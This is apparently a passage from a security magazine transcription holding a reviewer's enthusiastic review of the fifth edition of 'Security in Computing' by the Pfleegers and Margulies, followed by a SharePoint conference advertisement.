The 910 page book is filled with heavy research and plenty of great real world examples. One of the first
things I noticed was that many of the references were from the 1960s, 70s, 80s and 90s. This tells me that
the authors went back to old school style and not just internet searches for content. If you do nothing else,
get this book just for the bibliography. It is amazing because it is filled with old ideas that we still haven’t
learned in security.
From a depth standpoint, this book should be mandatory reading for anyone after they obtain their CISSP.
The Pfleegers and Margulies do a great job of presenting deeper understandings of security concepts along
with pictures and examples from recent security failures. They stick to the basics of confidentiality, integrity
and availability (CIA) but build off of those to show the reader how those concepts extend to a much wider
field of study.
This is not a classroom textbook, this is a manual on digital security with all the juicy stories that didn’t
make the headlines and all the original papers written before blogs existed. You will find exercises at the end
of each chapter that are fairly well written but it’s kind of difficult to complete the exercises when your jaw
is still on the floor. There is just too much great information in each page not to laugh (or cry) to yourself
about how far we haven’t come in this field.
Security in Computing is in it’s fifth edition, which just came out a few months into 2015. The ink is still wet
but I didn’t see much updated information from the fourth edition. But than again, security hasn’t fixed many
mistakes in the two and half decades I’ve been in it so I figure there isn’t much new catastrophes to talk
about. Sony is still messing up, that hasn’t changed. Passwords are still weak. Applications are still poorly
written. Hardware has bugs at the firmware level. I’m hard pressed to think on anything new to add that isn’t
already covered in this huge book.
I guess they could have talked about Hillary Clinton and her private email server or Target’s data breach but
that would just remind us of other security errors from the past. One of my favorite parts of this book is how
each topic is clearly explained but not dumbed-down. I’m not the brightest guy but I do like the author to
write at the appropriate level. The diagrams and pictures are helpful if you are really into flow carts. Some
are even pretty funny.
Across the board, there isn’t a topic that wasn’t covered in this book. Okay, there were some things that
could have been added but nothing that would make a big difference to this high quality book. Just to give
you an idea of how big the reference material is: there are 27 pages of bibliographic information at the back
of the book, all written in fine print. I needed to wear two pair of glasses to read some of those resources.
If you are interested in learning a heck of a lot more about our history and future as security professionals,
you’ll need this book. You will not pass any certification, get any special initials after your last name, or
even earn a promotion for reading this book. However, if you are passionate about this field, I highly suggest
you buy this book and read it. Older folks will appreciate the nods to those who taught us. Younger readers
will appreciate where we came from before security vendors took over this profession.
94
About the Author
95
Learn what’s new in
SharePoint and Office 365!
SharePoint in the Cloud?
On Premises? Or Both?
Come to SPTechCon Boston 2015 and learn about the
differences between Office 365, cloud-hosted SharePoint,
on-premises SharePoint, and hybrid solutions and build your
company's SharePoint Roadmap!
August 24 -27, 2015
BOSTON
Over 70 classes
taught by expert speakers!
“This was a great conference that addresses all levels, roles and
abilities. Great variety of classes, great presenters, and I learned
many practical things that I can take back and start implementing
next week.”
—Kathy Mincey, Collaboration Specialist, FHI 360
Looking for SharePoint 2013 training?
Check out these targeted classes!
• Custom SharePoint 2013 Workflows that Use the SharePoint 2013
REST API
• SharePoint 2013 Farm Architecture and Visual Studio for Admin
• Creating a Branded Site in SharePoint 2013
• SharePoint's New Swiss Army Knife: The Content Search Web Part
Moving to Office 365?
Here are some targeted classes for YOU!
•
•
•
•
Baby-Stepping Into the Cloud with Hybrid Workloads
Demystifying Office 365 Administration
Document Management and Records Management for Office 365
Office 365 Search in the Cloud
MASTER THE PRESENT, PLAN FOR THE FUTURE! REGISTER NOW!
A BZ Media Event
SPTechCon™ is a trademark of BZ Media LLC. SharePoint® is a registered trademark of Microsoft.
www.sptechcon.com

Hakin9 - ISO Interactive

Transcription

Similar documents

Crossing the Streams with State Machines in IDS

Anti-virus No Thanks

scorpio net security services presents

why every marketeer should take up lifehacking

The Saddle Club at the Equestrian Centre

Invasion to Green Territory War Room Strategy

44887 CL saddle club

PDAs as Hacker-Swiss-Army-Knives

Presentation - Karl Tryggvason

Ampeg SVT-CL Schematics